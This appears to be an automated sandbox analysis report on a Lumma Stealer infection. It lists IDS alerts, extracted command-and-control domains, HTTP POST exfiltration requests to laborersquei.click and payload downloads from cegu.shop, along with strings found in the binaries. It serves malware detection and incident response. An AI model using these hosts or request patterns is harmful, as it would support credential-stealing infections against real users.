                  Source: Binary string: %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%cuser + domain + host name too bigcompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAES_ASM -DVPAES_ASM -DBSAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
                  Source: Binary string: CrashReportClient.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD078E000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
                  Source: Binary string: C:\work\mesa\git\mesa\build\windows-x86_64\gallium\targets\libgl-gdi\opengl32.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr
                  Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.2316088773.00000000032E8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: d:\a01\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.10.dr
                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\709182Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\709182\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.16:49708 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49717 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49708 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.16:49713 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.16:49709 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49709 -> 172.67.166.49:443
                  Source: Malware configuration extractorURLs: laborersquei.click
                  Source: Malware configuration extractorURLs: screwamusresz.buzz
                  Source: Malware configuration extractorURLs: inherineau.buzz
                  Source: Malware configuration extractorURLs: cashfuzysao.buzz
                  Source: Malware configuration extractorURLs: appliacnesot.buzz
                  Source: Malware configuration extractorURLs: hummskitnj.buzz
                  Source: Malware configuration extractorURLs: scentniej.buzz
                  Source: Malware configuration extractorURLs: prisonyfork.buzz
                  Source: Malware configuration extractorURLs: rebuildeso.buzz
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49719 -> 172.67.214.186:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49718 -> 185.161.251.21:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49714 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49715 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49710 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49717 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49708 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49709 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49716 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49713 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49712 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49711 -> 172.67.166.49:443
                  Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.214.186:443 -> 192.168.2.16:49719
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: laborersquei.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OP2N2ST4JG5LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12809Host: laborersquei.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PW26DGQR6PK3HXLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15062Host: laborersquei.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J00HHUFWER406WDENMRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20429Host: laborersquei.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1ALGZ4CTARQPMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 637Host: laborersquei.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1RG2I12A0GZ9UYBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1565Host: laborersquei.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0HJAY2QJQ8EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1140Host: laborersquei.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KACTUHKC32X8JDQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1103Host: laborersquei.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: laborersquei.click
                  Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
                  Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipsyzogey.shop
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
                  Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipsyzogey.shop
                  Source: global trafficDNS traffic detected: DNS query: MKEsavqGIoOOFKIkcwQOiuYAysc.MKEsavqGIoOOFKIkcwQOiuYAysc
                  Source: global trafficDNS traffic detected: DNS query: laborersquei.click
                  Source: global trafficDNS traffic detected: DNS query: cegu.shop
                  Source: global trafficDNS traffic detected: DNS query: klipsyzogey.shop
                  Source: global trafficDNS traffic detected: DNS query: dfgh.online
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: lang-1049.dll.10.dr, lang-1058.dll.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: installer_1.05_36.4.exe.10.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
                  Source: Lightweight.com, 00000017.00000003.2278853392.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.2278719622.0000000003BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0P
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drString found in binary or memory: http://crl.globalsign.net/root.crl0
                  Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: lang-1049.dll.10.dr, lang-1058.dll.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: lang-1049.dll.10.dr, lang-1058.dll.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: installer_1.05_36.4.exe.10.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                  Source: installer_1.05_36.4.exe.10.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                  Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                  Source: powershell.exe, 0000001E.00000002.2321451025.0000000005724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.microsx
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://llvm.org/):
                  Source: installer_1.05_36.4.exe, 0000000C.00000000.1529422851.0000000000409000.00000002.00000001.01000000.00000008.sdmp, installer_1.05_36.4.exe.10.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: powershell.exe, 0000001C.00000002.2156080772.000000000611A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: Lightweight.com, 00000017.00000003.2278853392.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.2278719622.0000000003BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, lang-1049.dll.10.dr, lang-1058.dll.10.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, lang-1049.dll.10.dr, opengl64.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drString found in binary or memory: http://ocsp.thawte.com0
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: installer_1.05_36.4.exe.10.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://s.symcd.com06
                  Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 0000001C.00000002.2134794357.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2321451025.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt0
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                  Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: Lightweight.com, 00000017.00000000.1572086112.0000000000AE5000.00000002.00000001.01000000.00000009.sdmp, Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Organization.20.dr, Lightweight.com.13.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                  Source: lang-1049.dll.10.dr, lang-1058.dll.10.drString found in binary or memory: http://www.avast.com0/
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drString found in binary or memory: http://www.crossteccorp.com
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, lang-1049.dll.10.dr, opengl64.dll.10.dr, lang-1058.dll.10.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: http://www.google.comDUMPREQFLUSHD:/build/
                  Source: powershell.exe, 0000001E.00000002.2367808691.0000000008D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.Ah
                  Source: installer_1.05_36.4.exe.10.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                  Source: opengl64.dll.10.drString found in binary or memory: http://www.unicode.org/copyright.html
                  Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 0000001C.00000002.2134794357.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2321451025.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                  Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugs.freedesktop.org/enter_bug.cgi?product=Mesa
                  Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Lightweight.com, 00000017.00000002.2304957335.0000000000FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
                  Source: Lightweight.com, 00000017.00000002.2304957335.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, Lightweight.com, 00000017.00000002.2307418203.0000000003B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
